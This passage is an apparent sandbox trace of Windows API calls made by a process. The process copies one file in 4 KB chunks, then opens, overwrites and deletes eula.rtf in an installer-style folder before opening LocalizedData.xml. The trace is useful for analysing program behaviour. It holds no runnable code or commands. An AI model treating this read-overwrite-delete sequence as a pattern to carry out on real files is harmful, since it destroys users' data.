hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.389] GetLastError () returned 0x0 [0070.389] SetLastError (dwErrCode=0x0) [0070.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.390] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0070.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0070.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.392] GetLastError () returned 0x0 [0070.392] SetLastError (dwErrCode=0x0) [0070.392] GetLastError () returned 0x0 [0070.392] SetLastError (dwErrCode=0x0) [0070.392] GetLastError () returned 0x0 [0070.392] SetLastError (dwErrCode=0x0) [0070.392] GetLastError () returned 0x0 [0070.392] SetLastError (dwErrCode=0x0) [0070.393] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.393] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.394] GetLastError () returned 0x0 [0070.394] SetLastError (dwErrCode=0x0) [0070.394] GetLastError () returned 0x0 [0070.394] SetLastError (dwErrCode=0x0) [0070.394] GetLastError () returned 0x0 [0070.394] SetLastError (dwErrCode=0x0) [0070.394] GetLastError () returned 0x0 [0070.394] SetLastError (dwErrCode=0x0) [0070.394] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.394] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.395] GetLastError () returned 0x0 [0070.395] SetLastError (dwErrCode=0x0) [0070.395] GetLastError () returned 0x0 [0070.395] SetLastError (dwErrCode=0x0) [0070.395] GetLastError () returned 0x0 [0070.395] SetLastError (dwErrCode=0x0) [0070.395] GetLastError () returned 0x0 [0070.395] SetLastError (dwErrCode=0x0) [0070.395] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.395] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.396] GetLastError () returned 0x0 [0070.396] SetLastError (dwErrCode=0x0) [0070.396] GetLastError () returned 0x0 [0070.396] SetLastError (dwErrCode=0x0) [0070.396] GetLastError () returned 0x0 [0070.396] SetLastError (dwErrCode=0x0) [0070.396] GetLastError () returned 0x0 [0070.396] SetLastError (dwErrCode=0x0) [0070.396] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.396] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.396] GetLastError () returned 0x0 [0070.396] SetLastError (dwErrCode=0x0) [0070.397] GetLastError () returned 0x0 [0070.397] SetLastError (dwErrCode=0x0) [0070.397] GetLastError () returned 0x0 [0070.397] SetLastError (dwErrCode=0x0) [0070.397] GetLastError () returned 0x0 [0070.397] SetLastError (dwErrCode=0x0) [0070.397] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.397] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.397] GetLastError () returned 0x0 [0070.397] SetLastError (dwErrCode=0x0) [0070.397] GetLastError () returned 0x0 [0070.397] SetLastError (dwErrCode=0x0) [0070.398] GetLastError () returned 0x0 [0070.398] SetLastError (dwErrCode=0x0) [0070.398] GetLastError () returned 0x0 [0070.398] SetLastError (dwErrCode=0x0) [0070.398] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.398] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.398] GetLastError () returned 0x0 [0070.398] SetLastError (dwErrCode=0x0) [0070.398] GetLastError () returned 0x0 [0070.398] SetLastError (dwErrCode=0x0) [0070.398] GetLastError () returned 0x0 [0070.398] SetLastError (dwErrCode=0x0) [0070.398] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.399] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.400] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.400] GetLastError () returned 0x0 [0070.400] SetLastError (dwErrCode=0x0) [0070.400] GetLastError () returned 0x0 [0070.400] SetLastError (dwErrCode=0x0) [0070.400] GetLastError () returned 0x0 [0070.400] SetLastError (dwErrCode=0x0) [0070.400] GetLastError () returned 0x0 [0070.400] SetLastError (dwErrCode=0x0) [0070.400] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.401] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.401] GetLastError () returned 0x0 [0070.401] SetLastError (dwErrCode=0x0) [0070.401] GetLastError () returned 0x0 [0070.401] SetLastError (dwErrCode=0x0) [0070.401] GetLastError () returned 0x0 [0070.401] SetLastError (dwErrCode=0x0) [0070.401] GetLastError () returned 0x0 [0070.401] SetLastError (dwErrCode=0x0) [0070.401] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.401] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.402] GetLastError () returned 0x0 [0070.402] SetLastError (dwErrCode=0x0) [0070.402] GetLastError () returned 0x0 [0070.402] SetLastError (dwErrCode=0x0) [0070.402] GetLastError () returned 0x0 [0070.402] SetLastError (dwErrCode=0x0) [0070.402] GetLastError () returned 0x0 [0070.402] SetLastError (dwErrCode=0x0) [0070.402] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.402] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.402] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.403] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.403] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.403] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.403] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.403] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.403] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.403] GetLastError () returned 0x0 [0070.403] SetLastError (dwErrCode=0x0) [0070.404] GetLastError () returned 0x0 [0070.404] SetLastError (dwErrCode=0x0) [0070.404] GetLastError () returned 0x0 [0070.404] SetLastError (dwErrCode=0x0) [0070.404] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x4b8, lpOverlapped=0x0) returned 1 [0070.404] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.404] GetLastError () returned 0x0 [0070.404] SetLastError (dwErrCode=0x0) [0070.404] ReadFile (in: hFile=0x41c, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.404] GetLastError () returned 0x0 [0070.404] SetLastError (dwErrCode=0x0) [0070.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0070.405] GetLastError () returned 0x0 [0070.405] SetLastError (dwErrCode=0x0) [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0070.405] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x4c0, lpOverlapped=0x0) returned 1 [0070.405] GetLastError () returned 0x0 [0070.405] SetLastError (dwErrCode=0x0) [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.405] GetLastError () returned 0x0 [0070.405] SetLastError (dwErrCode=0x0) [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0070.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.405] CloseHandle (hObject=0x428) returned 1 [0070.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.408] CloseHandle (hObject=0x41c) returned 1 [0070.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0070.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0070.408] AreFileApisANSI () returned 1 [0070.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0070.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.408] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.409] GetFileType (hFile=0x41c) returned 0x1 [0070.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0070.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.410] GetLastError () returned 0xb7 [0070.410] SetLastError (dwErrCode=0xb7) [0070.410] WriteFile (in: hFile=0x41c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.414] CloseHandle (hObject=0x41c) returned 1 [0070.414] AreFileApisANSI () returned 1 [0070.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0070.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0070.414] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0070.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.415] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0070.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0070.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0070.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.416] AreFileApisANSI () returned 1 [0070.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.417] AreFileApisANSI () returned 1 [0070.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0070.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0070.417] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.417] GetFileType (hFile=0x41c) returned 0x1 [0070.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0070.417] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.417] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.417] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.418] CloseHandle (hObject=0x41c) returned 1 [0070.418] AreFileApisANSI () returned 1 [0070.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0070.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 